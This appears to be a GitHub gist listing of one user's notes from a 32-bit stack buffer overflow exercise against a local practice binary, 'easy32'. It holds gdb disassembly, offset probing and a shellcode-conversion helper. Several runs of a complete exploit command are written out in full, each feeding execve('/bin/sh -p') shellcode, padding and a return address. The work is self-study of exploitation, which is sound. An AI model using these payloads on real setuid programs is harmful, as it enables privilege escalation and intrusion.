Skip to content

Instantly share code, notes, and snippets.

View fgsahoward's full-sized avatar

Austin Howard fgsahoward

5 followers · 0 following
View GitHub Profile
@fgsahoward
fgsahoward / easy32_debugging7
Created June 11, 2018 15:39
[howard@sterling shellcodes]$ /home/howard/repos/bof/easy32 `perl -e 'print "\x31\xff\x57\xeb\x2b\x8b\x3c\x24\x31\xd2\xb2\x41\x30\x57\x07\x8b\x7c\x24\x04\x30\x57\x02\x8b\x1c\x24\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\xe8\xee\xff\xff\xff\x2d\x70\x41", "A"x0x3d4, "\x70\xd1\xff\xff"'`
Input: 1�W�+�<$1ҲA0W�|$0W�$��1�1��
�����/bin/shA�����-pAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@fgsahoward
fgsahoward / easy32_main_disassembly
Created June 11, 2018 15:38
[howard@sterling shellcodes]$ gdb -q ../easy32
Reading symbols from ../easy32...done.
(gdb) disas main
Dump of assembler code for function main:
0x08048483 <+0>: lea 0x4(%esp),%ecx
0x08048487 <+4>: and $0xfffffff0,%esp
0x0804848a <+7>: pushl -0x4(%ecx)
0x0804848d <+10>: push %ebp
0x0804848e <+11>: mov %esp,%ebp
0x08048490 <+13>: push %ecx
@fgsahoward
fgsahoward / easy32_debugging6
Created June 11, 2018 15:37
[howard@sterling shellcodes]$ /home/howard/repos/bof/easy32 `perl -e 'print "\x31\xff\x57\xeb\x2b\x8b\x3c\x24\x31\xd2\xb2\x41\x30\x57\x07\x8b\x7c\x24\x04\x30\x57\x02\x8b\x1c\x24\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\xe8\xee\xff\xff\xff\x2d\x70\x41", "A"x0x3d4, "\x77\xd1\xff\xff"'`
Input: 1�W�+�<$1ҲA0W�|$0W�$��1�1��
�����/bin/shA�����-pAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@fgsahoward
fgsahoward / easy32_debugging5
Created June 11, 2018 15:37
[howard@sterling shellcodes]$ env > shell.env
[howard@sterling shellcodes]$ gdb -q ../easy32
Reading symbols from ../easy32...done.
(gdb) r `env > gdb.env`
Starting program: /home/howard/repos/bof/easy32 `env > gdb.env`
[Inferior 1 (process 2920) exited with code 01]
(gdb) q
[howard@sterling shellcodes]$ wc -c shell.env
1004 shell.env
[howard@sterling shellcodes]$ wc -c gdb.env
@fgsahoward
fgsahoward / easy32_debugging4
Created June 11, 2018 15:35
[howard@sterling shellcodes]$ /home/howard/repos/bof/easy32 `perl -e 'print "\x31\xff\x57\xeb\x2b\x8b\x3c\x24\x31\xd2\xb2\x41\x30\x57\x07\x8b\x7c\x24\x04\x30\x57\x02\x8b\x1c\x24\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\xe8\xee\xff\xff\xff\x2d\x70\x41", "A"x0x3d4, "\x80\xd1\xff\xff"'`
Input: 1�W�+�<$1ҲA0W�|$0W�$��1�1��
�����/bin/shA�����-pAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@fgsahoward
fgsahoward / easy32_debugging3
Created June 11, 2018 15:34
(gdb) r `perl -e 'print "\x31\xff\x57\xeb\x2b\x8b\x3c\x24\x31\xd2\xb2\x41\x30\x57\x07\x8b\x7c\x24\x04\x30\x57\x02\x8b\x1c\x24\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\xe8\xee\xff\xff\xff\x2d\x70\x41", "A"x0x3d4, "\x80\xd1\xff\xff"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/howard/repos/bof/easy32 `perl -e 'print "\x31\xff\x57\xeb\x2b\x8b\x3c\x24\x31\xd2\xb2\x41\x30\x57\x07\x8b\x7c\x24\x04\x30\x57\x02\x8b\x1c\x24\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\xe8\xee\xff\xff\xff\x2d\x70\x41", "A"x0x3d4, "\x80\xd1\xff\xff"'`
Input: 1�W�+�<$1ҲA0W�|$0W�$��1�1��
�����/bin/shA�����-pAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@fgsahoward
fgsahoward / easy32_debugging2
Created June 11, 2018 15:32
(gdb) r `perl -e 'print "A"x0x40c, "B"x0x4'`
Starting program: /home/howard/repos/bof/easy32 `perl -e 'print "A"x0x40c, "B"x0x4'`
Input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@fgsahoward
fgsahoward / easy32_debugging1
Created June 11, 2018 15:30
[howard@sterling shellcodes]$ gdb -q ../easy32
Reading symbols from ../easy32...done.
(gdb) disas vulnerable
Dump of assembler code for function vulnerable:
0x0804844b <+0>: push %ebp
0x0804844c <+1>: mov %esp,%ebp
0x0804844e <+3>: sub $0x408,%esp
0x08048454 <+9>: sub $0x8,%esp
0x08048457 <+12>: pushl 0x8(%ebp)
0x0804845a <+15>: lea -0x408(%ebp),%eax
@fgsahoward
fgsahoward / shell3_32_debugging1
Created June 11, 2018 15:29
[howard@sterling shellcodes]$ cat shell3_32.sc | wc -c
225
[howard@sterling shellcodes]$ python -c "print(hex(int(224 / 4)))"
0x38
@fgsahoward
fgsahoward / object_file_to_shellcode
Created June 11, 2018 15:28
[howard@sterling shellcodes]$ cat ../tools/otosc.py
#!/usr/bin/python
##
# Takes as input the ouput from:
# objdump -Dz | grep "[0-9a-f]*?:" | cut -f 1,2
import sys
def main(inputs, outputfile):
lines = [x.strip(" ") for x in inputs.split("\n")]